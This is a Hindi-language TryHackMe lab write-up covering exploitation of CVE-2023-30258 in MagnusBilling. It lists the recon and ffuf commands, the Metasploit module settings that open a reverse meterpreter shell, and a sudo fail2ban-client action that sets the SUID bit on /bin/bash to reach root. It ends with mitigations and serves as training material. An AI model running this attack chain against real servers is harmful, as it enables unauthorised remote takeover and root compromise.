
CVE-2023-30258 (MagnusBilling RCE) का शोषण करने और fail2ban गलत कॉन्फ़िगरेशन के माध्यम से TryHackMe लैब पर विशेषाधिकार बढ़ाने का चरण-दर-चरण वॉकथ्रू। वेब एनुमरेशन, Metasploit शोषण, और लिनक्स विशेषाधिकार वृद्धि को प्रदर्शित करता है।
⸻
🛡️ MagnusBilling RCE → रूट (CVE-2023-30258)
📌 अवलोकन • लक्ष्य: 10.145.148.203 • प्लेटफ़ॉर्म: TryHackMe • कमज़ोरी: CVE-2023-30258 • पहुँच: बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) • विशेषाधिकार वृद्धि: fail2ban गलत कॉन्फ़िगरेशन • अंतिम पहुँच: रूट
⸻
🔍 1. टोह लेना (Reconnaissance)
पोर्ट स्कैन
rustscan -a 10.145.148.203
📊 खुले पोर्ट
पोर्ट सेवा
22 SSH
80 HTTP
3306 MySQL
5038 Asterisk

Asterisk की उपस्थिति VoIP/बिलिंग प्रणाली की ओर संकेत करती है।
⸻
🌐 2. वेब एन्यूमरेशन
डायरेक्टरी फ़ज़िंग
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c
📁 निष्कर्ष: • /archive • /assets • /lib • /tmp • /protected
/mbilling पथ को संभावित हमले के वेक्टर के रूप में पहचाना गया है।

⸻
🚨 3. कमज़ोरी की पहचान
CVE-2023-30258
MagnusBilling निम्नलिखित के प्रति संवेदनशील है: • बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) • कमांड इंजेक्शन • पूर्ण सिस्टम समझौता
⸻
💣 4. शोषण (Metasploit)
msfconsole
search CVE:2023-30258
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS 10.145.148.203
set LHOST tun0
set LPORT 4444
run

⸻
🎯 परिणाम
meterpreter सत्र खुल गया
sysinfo
OS: Linux Debian User: asterisk
⸻
🔐 5. प्रारंभिक पहुँच
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
whoami
asterisk
⸻
🏁 6. उपयोगकर्ता फ़्लैग
cd /home/magnus cat user.txt
⸻
🔎 7. विशेषाधिकार वृद्धि
sudo जाँचें
sudo -l
(ALL) NOPASSWD: /usr/bin/fail2ban-client
गंभीर गलत कॉन्फ़िगरेशन का पता चला!
⸻
💣 8. Fail2Ban का शोषण
दुर्भावनापूर्ण एक्शन जोड़ें
sudo fail2ban-client set mbilling_login addaction evil
sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"
sudo fail2ban-client set mbilling_login banip 127.0.0.1
⸻
🚀 9. रूट पहुँच
/bin/bash -p
id
euid=0(root)
शुरुआत में whoami ने asterisk लौटाया। bash -p का उपयोग करके रूट तक वृद्धि की जाती है।
⸻
👑 10. रूट फ़्लैग
cat /root/root.txt
⸻
🧠 11. मुख्य निष्कर्ष • CVE शोषण ने आसान प्रारंभिक पहुँच प्रदान की • वेब एन्यूमरेशन महत्वपूर्ण है (ffuf ने /mbilling की पहचान की) • गलत कॉन्फ़िगर किया गया sudo पूर्ण सिस्टम समझौते का कारण बन सकता है • fail2ban का दुरुपयोग विशेषाधिकार वृद्धि के लिए किया जा सकता है
⸻
🛡️ 12. शमन (Mitigation) • MagnusBilling को नवीनतम संस्करण में अपडेट करें • sudo कॉन्फ़िगरेशन से NOPASSWD हटाएँ • fail2ban-client तक पहुँच प्रतिबंधित करें • वेब अनुप्रयोगों और एंडपॉइंट्स को सख्त करें
⸻
💀 निष्कर्ष
यह मशीन एक यथार्थवादी हमले की श्रृंखला प्रदर्शित करती है:
वेब RCE → शेल → विशेषाधिकार वृद्धि → रूट
कमज़ोरी + गलत कॉन्फ़िगरेशन के संयोजन ने पूर्ण सिस्टम समझौता किया।